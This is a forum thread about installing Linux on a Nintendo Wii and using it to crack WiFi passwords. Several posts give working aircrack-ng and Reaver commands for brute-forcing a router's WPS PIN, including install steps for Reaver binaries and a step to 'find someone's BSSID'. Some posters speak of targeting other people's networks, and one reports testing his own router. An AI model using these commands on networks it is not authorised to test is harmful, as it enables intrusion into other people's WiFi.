Hacking How to crack WiFi passwords with your Wii

WiiLinuxNinja

OP
Trophies
XP
Country
United States
@[member='Fishaman P']
Easy Wii Linux comes with a virtual keyboard installed, so you can operate it with just a wiimote. And it only takes 2 files to install it to your FAT16 sd card with no special formatting.

@tom101222
The wii wifi card can absolutely enter monitor mode, and I confirm it works. If you don't believe me try it for yourself before you question someone else's work.

akari212

Trophies
XP
Country
even if it works, is Wii's CPU power is fast enough to crack a password.

Maybe if you use a PS3's CellBE processor, it will take less than a day to crack a WPA/WPA2 passphrase (WPA/WPA2 in hex is much easier to crack as it only use a-f characters and 0-9 in numerals). Or less than an hour if its WEP.

DeadlyFoez

XFlak Fanboy
Banned
Trophies
Website
DeadlyFoez.zzl.org
XP
Country
United States
It's a broadcom chipset. Looks to me that it can enter monitor mode. I'm just having a bitch of a time getting X started. I keep getting errors while booting that pretty much read only. I'll have to dig into this a little deeper to figure it out.

Roamin64

Trophies
XP
Country
Canada
I'm wondering why Reaver wouldn't work? After all all Reaver requires is that your card be in monitor mode.

airmon-ng start wlan0
airodump-ng mon0
find someone's BSSID (ex. 00:01:02:03:04:05)
reaver -i mon0 -b 00:01:02:03:04:05
wait few hours
Passphrase + PIN are spit out.

you can grab Reaver from http://code.google.com/p/reaver-wps/
follow the project's readme to compile and use different options when running it.

I have not used Reaver on the wii, but rather on a backtrack distro. The creepy thing about WPS attacks is that some routers are still vulnerable even if WPS is tured off. I personnally used Reaver to test my router, took 3h to crack WPS (i used : reaver -i mon0 -b 00:01:02:03:04:05 -d 1) which attacked my router every 1 second, and PIN was found after 97% of the keys were tried. Luckily WPS really does turn off on my router, so i'm safe.

DeadlyFoez

XFlak Fanboy
Banned
Trophies
Website
DeadlyFoez.zzl.org
XP
Country
United States
You can't just use a PC to crack a Wifi password?
Yes, you can. But doing it on the wii makes you feel warm and fuzzy knowing that you can use it for even more things.

I personally barely use my wii. I've got my kids wii which is just used for watching videos, the wii in my living room for videos and games, and then my tech wii for all the stuff I test out and try.

DeadlyFoez

XFlak Fanboy
Banned
Trophies
Website
DeadlyFoez.zzl.org
XP
Country
United States
I'm just trying to get EWL started and everything I try I still run into the same issue.
[sharedmedia=gallery:images:3107]
EDIT: ^^ I know it says Image Not Found for whatever stupid reason, but just click it and it will show up.
Anyone have a clue? I've done a fresh format to my SD card multiple times. I've tried as many things that I can think of.

This is my first time trying to get linux working on my wii.

Ok, so I've tried FAT, FAT32, different unit allocation sizes and nothing is working and I've followed the instructions exactly as stated.

The only other option is that my SD card is incompatible.... which I highly doubt because it works with everything else in the world, but I guess thats the last thing that I can rule out.

This is certainly starting to piss me off.

WiiLinuxNinja

OP
Trophies
XP
Country
United States
@[member='deadly'] Foez

Keep your SD card formatted FAT/FAT16. FAT32 shouldnt work.
Did you extract the linux disk image and save it to a folder called linux on the root of your SD card?
Are you loading the kernel with the bootmii menu?
Can you post images of the output from earlier in the boot process?

DeadlyFoez

XFlak Fanboy
Banned
Trophies
Website
DeadlyFoez.zzl.org
XP
Country
United States
I figure out part of my problem. The wii that I was originally trying this with had my NAND and SD card activity light mod on it. When I tried it from my other normal wii then everything worked. I already knew that my SD/NAND activity light hack was drawing more power than what should have been used, but it never created any issues with any other apps. Aparently there is something with this EWL that is more sensitive than anything else that could be run from the wii.

I have still run into a few small issues, but it was mostly solves by using a different wii. I guess I need to adjust my PIC's code and add a resistor in between the signal of the SD card and my PIC and everything should work fine.

But this EWL is FAR from perfect. When I have gotten it to run, it brings me back to the days of when linux barely ran with 8-bit graphics. It kinda of reminds me Commander Keen and Hugo's House of Horrors.

Shit.. Commander Keen. I need to find the forgottenware for it again. That was a fun game.

zerofalcon

Trophies
XP
Country
390356_269318103134892_100001701147342_829300_1549046857_n.jpg

Hey thanks for your tutorial works perfect in my Wii.
Now it's time to have fun :evil: :ninja:

WiiLinuxNinja

OP
Trophies
XP
Country
United States
If anyone wants to try reaver-wps. Here are the compiled binaries for version 1.3 to be used with EWL.

http://www.mediafire...k/reaver.tar.gz

Installation: (Save this file to /home/wii/downloads and the Open Terminal)
su
cd downloads
tar -xvzf reaver.tar.gz
cd reaver
mkdir /etc/reaver
cp reaver.db /etc/reaver
cp walsh /usr/local/bin
ln -s /usr/local/bin/walsh /usr/bin/walsh
ln -s /usr/local/bin/reaver /usr/bin/reaver
rm *
cd ..
rmdir reaver

Usage: (Open Terminal)
su
airmon-ng start wlan0
reaver -i mon0 -b XX:XX:XX:XX:XX:XX

For more information on using reaver. http://code.google.c...aver-wps/w/list

I haven't had any success using this yet. I'm not sure if has to do with the Wii's WiFi card's limited speed, or if none of the access points I tried it on where vulnerable. Using the -vv option for very verbose output this is what I see.

Code:
reaver -i mon0 -vv -b XX:XX:XX:XX:XX:XX

Reaver v1.0 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner 

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 1
[+] Switching mon0 to cha...

and it just keeps switching channels.

If you try it, and are successful please post your results.

Reactions: 1 person

NoeMisaelJimenez

Trophies
XP
Country
Mexico
Hey does anybody know of a way to download files from the internet with the wii?? The internet channel doesn't allow downloading but maybe theres an aplication 4 downloading??

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
  • BigOnYa @ BigOnYa:
    6/10 rating on steam
  • Psionic Roshambo @ Psionic Roshambo:
    I would like a Predator game "Kill Team" it takes place in the Jungle of the first movie, your team is sent to hunt the predator, using current tech drones and a trained team. Set traps use strategy to hunt and trap or kill the predator.
  • BigOnYa @ BigOnYa:
    Ill stick with my Battlefield. Yea a predator hunting game like that would be cool. Esp if you can be Arnold and say "Get to da choppa"
    +1
    Maybe Arnold could do a cameo voice acting, he is the one briefing you on the mission
    +1
    Honestly surprised they didn't make a tie in game for Predators that movie was awesome
    I was kinda sad the Yakuza guy died sword fighting a predator lol
    The Russian guy went out like a boss
    Double claymores to the face definitely kill a predator lol
  • BigOnYa @ BigOnYa:
    I went today and looked at a motorcycle someone was selling. I get there and the battery on it was dead, so the guy grabbed a battery charger and hooked it up. He plugged it into the wall, and the motorcycle sparked and started smoking. Come to find out the bike uses a 6 volt battery and the guy had the charger set to 12v. I said sorry to the dude and walked away. I felt bad for him tho.
    Sounds like it would be an exciting ride....
    Not sure I would want something on fire between my legs
  • BigOnYa @ BigOnYa:
    He ruined it basically. Sad cause it was a decent old bike. It would take more money to rewire the bike than it was worth tho.
    Yeah I'm sure at minimum the starter was fried
    Alternator and battery
  • BigOnYa @ BigOnYa:
    Prob alot of fried parts. It was still smoking when I left.
  • K3Nv2 @ K3Nv2:
    I would've said show me how it rides
    I always wanted one of those Smart Cars with a Hyabusa motor in it.
  • K3Nv2 @ K3Nv2:
    I'm getting sick and tired of cheap ass baking pans now
  • BigOnYa @ BigOnYa:
    I think it be cool to have one that would fit in my pickup truck bed, then I could put down ramps n drive it off.
  • K3Nv2 @ K3Nv2:
    Used this one 5 times already impossible to clean
  • BigOnYa @ BigOnYa:
    You need the $900 copper coated ones, they are good for at least 10 times cooking before they are un cleanable
    Condoms are only meant to be used once Ken lol
    Psionic Roshambo @ Psionic Roshambo: Condoms are only meant to be used once Ken lol